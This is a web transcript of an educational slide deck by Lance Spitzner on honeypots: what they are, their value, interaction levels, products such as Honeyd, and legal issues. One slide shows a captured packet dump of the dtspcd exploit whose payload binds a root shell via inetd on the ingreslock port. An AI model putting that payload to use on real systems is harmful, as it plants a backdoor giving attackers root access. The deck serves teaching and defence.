Honeypots.

Slides:



Advertisements
Similar presentations
Honeynet Introduction Tang Chin Hooi APAN Secretariat.
Advertisements

Uzair Masood MASYU001.  What is a honey Pot ? “ A honey pot is an information system resource whose value lies in unauthorized or illicit use.
HONEYPOTS Mathew Benwell, Sunee Holland, Grant Pannell.
Honeypot Group 1E Zahra Kamali (KAMZY001) Pratik Doshi (DOSPY001) Tapan Dave (DAVTH001)
Honeypot 서울과학기술대학교 Jeilyn Molina Honeypot is the software or set of computers that are intended to attract attackers, pretending to be weak.
HoneyPots Malware Class Presentation Xiang Yin, Zhanxiang Huang, Nguyet Nguyen November 2 nd 2004.
Honey Pots: Natures Dessert or Cyber Defense Tool? Eric Richardson.
Presented by Stanley Chand & Damien Prescod
Honeypots and Honeynets Source: The HoneyNet Project Book: Know Your Enemy (2 nd ed) Presented by: Mohammad.
Honeypots, Honeynets, and the Honeywall David Dittrich The Information School/C&C The University of Washington ARO Information Assurance Workshop 3 March.
Honeypots Margaret Asami. What are honeypots ? an intrusion detection mechanism entices intruders to attack and eventually take over the system, while.
Intrusion Prevention System DYNAMIC HONEYNET by Rosenfeld Asaf advisor Uritzky Max.
Lesson 13-Intrusion Detection. Overview Define the types of Intrusion Detection Systems (IDS). Set up an IDS. Manage an IDS. Understand intrusion prevention.
January 14, 2010 Introduction to Ethical Hacking and Network Defense MIS © Abdou Illia.
1 The Honeynet Project: Trapping the Hackers Lance Spitzner, Sun Microsystems Presented by Vikrant Karan.
Honeypots By Merkur Maclang and John Luzzi CMPT 495.
Lecture 11 Intrusion Detection (cont)
Network Forensics Networking Basics Collecting Network-Based Evidence (NBE) Collection of Packets using Tools Windows Intrusion UNIX Intrusion.
USENIX LISA ‘99 Conference © Copyright 1999, Martin Roesch Snort - Lightweight Intrusion Detection for Networks Martin Roesch.
Introduction to Honeypot, Botnet, and Security Measurement
Intrusion Detection Chapter 12.
Intrusion Detection Chapter 12.
Kirby Kuehl Honeynet Project Member 05/08/2002 Intrusion Deception.
HONEYPOT.  Introduction to Honeypot  Honeytoken  Types of Honeypots  Honeypot Implementation  Advantages and Disadvantages  Role of Honeypot in.
Automating Forensics. 2 Speaker Passion is honeypots. President, Honeynet Project Author Honeypots: Tracking and Co-Author Know Your Enemy. 8 Years in.
HoneyD (Part 2) Small Business NIDS This presentation demonstrates the ability for Small Businesses to emulate virtual operating systems and conduct.
Honeypots. Introduction A honeypot is a trap set to detect, deflect, or in some manner counteract attempts at unauthorized use of information systems.
Honeypot and Intrusion Detection System
Honeypots. Your Speaker Lance Spitzner –Senior Security Architect, Sun Microsystems –Founder of the Honeynet Project –Author of Honeypots: Tracking Hackers.
Honeypots and Honeynets A New Response to Cybercrime Analysis NAAG Seattle 04/14/03.
Honeypots “The more you know about the enemy, the better you can protect about yourself” Rohan Rajeevan Srikanth Vanama Rakesh Akkera.
Deploying Honeynets Dodge, Jr., & Ragsdale - Presentation by Janakiram Dandibhotla.
A Virtual Honeypot Framework Author: Niels Provos Published in: CITI Report 03-1 Presenter: Tao Li.
Honeynets Detecting Insider Threats Kirby Kuehl
Introduction 1. Introduction Goal of this Presentation: To give a better understanding of the overview of our project. Such as: Researches Researches Project.
KFSensor Vs Honeyd Honeypot System Sunil Gurung
Intruders Detection Systems Presently there is much interest in systems, which can detect intrusions, IDS (Intrusion Detection System). IDS are of very.
1Of 25. 2Of 25  Definition  Advantages & Disadvantages  Types  Level of interaction  Honeyd project: A Virtual honeypot framework  Honeynet project:
HONEYPOTS PRESENTATION TEAM: TEAM: Ankur Sharma Ashish Agrawal Elly Bornstein Santak Bhadra Srinivas Natarajan.
HONEYPOT By SIDDARTHA ELETI CLEMSON UNIVERSITY. Introduction Introduced in 1990/1991 by Clifford Stoll’™s in his book “The Cuckoo’s Egg” and by Bill Cheswick’€™s.
A VIRTUAL HONEYPOT FRAMEWORK Author : Niels Provos Publication: Usenix Security Symposium Presenter: Hiral Chhaya for CAP6103.
. 1. Computer Security Concepts 2. The OSI Security Architecture 3. Security Attacks 4. Security Services 5. Security Mechanisms 6. A Model for Network.
SNORT Biopsy: A Forensic Analysis on Intrusion Detection System By Asif Syed Chowdhury.
A Virtual Honeypot Framework Niels Provos Google, Inc. The 13th USENIX Security Symposium, August 9–13, 2004 San Diego, CA Presented by: Sean Mondesire.
An Intrusion Detection System to Monitor Traffic Through the CS Department Christy Jackson, Rick Rossano, & Meredith Whibley April 24, 2000.
Introduction to Honeypot, measurement, and vulnerability exploits
Honeypots and Honeynets Alex Dietz. To discover methods used to breach a system To discover new root kits To learn what changes are made to a system and.
Reducing false positives in intrusion detection systems by means of frequent episodes Lars Olav Gigstad.
1 HoneyNets. 2 Introduction Definition of a Honeynet Concept of Data Capture and Data Control Generation I vs. Generation II Honeynets Description of.
Evaluate the Merits of Using Honeypots to Defend against Distributed Denial- of-Service Attacks on Web Servers By Cheow Lip Goh.
Honeypots Today & Tomorrow. Speaker Involved in information security for over 10 years, 4 with Sun Microsystems as Senior Security Architect. Founder.
Intrusion Detection Reuven, Dan A. Wei, Li Patel, Rinku H.
By Daniel, Amitsinh & Alfred.  Collect small data sets which are of high value  All activity is assumed to be malicious  Able to capture encrypted.
HONEYPOTS An Intrusion Detection System. Index Intrusion Detection System Host bases Intrusion Detection System Network Based Intrusion Detection System.
HoneyStat: Local Worm Detection Using Honeypots David Dagon, Xinzhou Qin, Guofei Gu, Wenke Lee, et al from Georgia Institute of Technology Authors: The.
Forensic Computing: Tools, Techniques and Investigations Assignment 1 Seminar.
UNDER THE GUIDENCE OF: Mr.M.JAYANTHI RAO,M.Tech HOD OF IT. BY: I.ADITHYA(09511A1212) HONEYPOTS.
Using Honeypots to Improve Network Security Dr. Saleh Ibrahim Almotairi Research and Development Centre National Information Centre - Ministry of Interior.
O honeynet Project Lognitive.com Disclaimer This is a technical session that contain non- technical content. Get relaxed so to get ready for some details.
Security in Networking
Honeypots and Honeynets
Honeypots and Honeynets
Intrusion Detection Systems (IDS)
Honeypots and Honeynets
CORE Security Technologies
12/6/2018 Honeypot ICT Infrastructure Sashan
Friday, December 07, 2018 Honeypot ICT Infrastructure Sashan Kantonsspital Graubunden ICT Department.
Security Overview: Honeypots
Intrusion Detection system
Honeypots Visit for more Learning Resources 1.
Presentation transcript:

Honeypots

Your Speaker Lance Spitzner Senior Security Architect, Sun Microsystems Founder of the Honeynet Project Author of Honeypots: Tracking Hackers Co-author of Know Your Enemy Moderator of <honeypots@securityfocus.com> maillist Former ‘tread head’.

Purpose To introduce you to honeypots, what they are, how they work, their value.

Problem Variety of misconceptions about honeypots, everyone has their own definition. This confusion has caused lack of understanding, and adoption.

Honeypot Timeline 1990/1991 The Cuckoo’s Egg and Evening with Berferd 1997 - Deception Toolkit 1998 - CyberCop Sting 1998 - NetFacade (and Snort) 1998 - BackOfficer Friendly 1999 - Formation of the Honeynet Project 2001 - Worms captured 2002 - dtspcd exploit capture

Definition Any security resource who’s value lies in being probed, attacked, or compromised

How honeypots work Simple concept A resource that expects no data, so any traffic to or from it is most likely unauthorized activity

Not limited to specific purpose Honeypots do not solve a specific problem, instead they are a tool that contribute to your overall security architecture. Their value, and the problems they help solve, depend on how build, deploy, and you use them.

Types Production (Law Enforcment) Research (Counter-Intelligence) Marty’s idea

Value What is the value of honeypots? One of the greatest areas of confusion concerning honeypot technologies.

Advantages Based on how honeypots conceptually work, they have several advantages. Reduce False Positives and False Negatives Data Value Resources Simplicity

Disadvantages Based on the concept of honeypots, they also have disadvantages: Narrow Field of View Fingerprinting Risk

Production Prevention Detection Response

Prevention Keeping the burglar out of your house. Honeypots, in general are not effective prevention mechanisms. Deception, Deterence, Decoys, are phsychological weapons. They do NOT work against automated attacks: worms auto-rooters mass-rooters

Detection Detecting the burglar when he breaks in. Honeypots excel at this capability, due to their advantages.

Response Honeypots can be used to help respond to an incident. Can easily be pulled offline (unlike production systems. Little to no data pollution.

Research Honeypots Early Warning and Prediction Discover new Tools and Tactics Understand Motives, Behavior, and Organization Develop Analysis and Forensic Skills

Early Warning and Prediction

Tools 01/08-08:46:04.378306 10.10.10.1:3592 -> 10.10.10.2:6112 TCP TTL:48 TOS:0x0 ID:41388 IpLen:20 DgmLen:1500 DF ***AP*** Seq: 0xFEE2C115 Ack: 0x5F66192F Win: 0x3EBC TcpLen: 32 TCP Options (3) => NOP NOP TS: 463986683 4158792 30 30 30 30 30 30 30 32 30 34 31 30 33 65 30 30 0000000204103e00 30 31 20 20 34 20 00 00 00 31 30 00 80 1C 40 11 01 4 ...10...@. 80 1C 40 11 10 80 01 01 80 1C 40 11 80 1C 40 11 ..@.......@...@. 80 1C 40 11 80 1C 40 11 80 1C 40 11 80 1C 40 11 ..@...@...@...@. D0 23 FF E0 E2 23 FF E4 E4 23 FF E8 C0 23 FF EC .#...#...#...#.. 82 10 20 0B 91 D0 20 08 2F 62 69 6E 2F 6B 73 68 .. ... ./bin/ksh 20 20 20 20 2D 63 20 20 65 63 68 6F 20 22 69 6E -c echo "in 67 72 65 73 6C 6F 63 6B 20 73 74 72 65 61 6D 20 greslock stream 74 63 70 20 6E 6F 77 61 69 74 20 72 6F 6F 74 20 tcp nowait root 2F 62 69 6E 2F 73 68 20 73 68 20 2D 69 22 3E 2F /bin/sh sh -i">/ 74 6D 70 2F 78 3B 2F 75 73 72 2F 73 62 69 6E 2F tmp/x;/usr/sbin/ 69 6E 65 74 64 20 2D 73 20 2F 74 6D 70 2F 78 3B inetd -s /tmp/x; 73 6C 65 65 70 20 31 30 3B 2F 62 69 6E 2F 72 6D sleep 10;/bin/rm 20 2D 66 20 2F 74 6D 70 2F 78 20 41 41 41 41 41 -f /tmp/x AAAAA 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA

Tactics

Motives and Behavior J4ck: why don't you start charging for packet attacks? J4ck: "give me x amount and I'll take bla bla offline for this amount of time" J1LL: it was illegal last I checked. J4ck: heh, then everything you do is illegal. Why not make money off of it? J4ck: I know plenty of people that'd pay exorbatent amounts for packeting.

Level of Interaction Level of Interaction determines amount of functionality a honeypot provides. The greater the interaction, the more you can learn. The greater the interaction, the more complexity and risk.

Risk Chance that an attacker can use your honeypot to harm, attack, or infiltrate other systems or organizations.

Low Interaction Provide Emulated Services No operating system for attacker to access. Information limited to transactional information and attackers activities with emulated services.

High Interaction Provide Actual Operating Systems Learn extensive amounts of information. Extensive risk.

Honeypots BackOfficer Friendly SPECTER Honeyd ManTrap Honeynets http://www.nfr.com/products/bof/ SPECTER http://www.specter.com Honeyd http://www.citi.umich.edu/u/provos/honeyd/ ManTrap http://www.recourse.com Honeynets http://project.honeynet.org/papers/honeynet/ Low Interaction High Interaction

BackOfficer Friendly

Specter

Honeyd create default set default personality "FreeBSD 2.2.1-STABLE" set default default action open add default tcp port 80 "sh /usr/local/honeyd/scripts/web.sh" add default tcp port 22 "sh /usr/local/honeyd/scripts/test.sh" add default tcp port 113 reset add default tcp port 1 reset create windows set windows personality "Windows NT 4.0 Server SP5-SP6" set windows default action reset add windows tcp port 80 "sh /usr/local/honeyd/scripts/web.sh" add windows tcp port 25 block add windows tcp port 23 proxy real-server.tracking-hackers.com:23 add windows tcp port 22 proxy $ipsrc:22 set template uptime 3284460 bind 192.168.1.200 windows

ManTrap

Honeynets

Which is best? None, they all have their advantages and disadvantages. It depends on what you are attempting to achieve.

Legal Issues Privacy Entrapment Liability

Legal Contact for .mil / .gov Department of Justice, Computer Crime and Intellectual Property Section General Number: (202) 514-1026 Specific Contact: Richard Salgado Direct Telephone (202) 353-7848 E-Mai: richard.salgado@usdoj.gov Any military or federal government organization can get legal advice for Honeynets from the Department of Justice. Richard Solgado of the DoJ has been researching Honeynet technologies and is the point of contact for any legal issues. For non government and military organizations, you are highly encouraged to refer to your local legal counsel for legal issues involving Honeynet technologies.

Summary Honeypos are a highly flexible security tool that can be used in a variety of different deployments.

Resources Honeypots: Tracking Hackers http://www.tracking-hackers.com

Feedback: Privacy Policy Feedback
Do Not Sell My Personal Information
About project: SlidePlayer Terms of Service

© 2024 SlidePlayer.com. Inc. All rights reserved.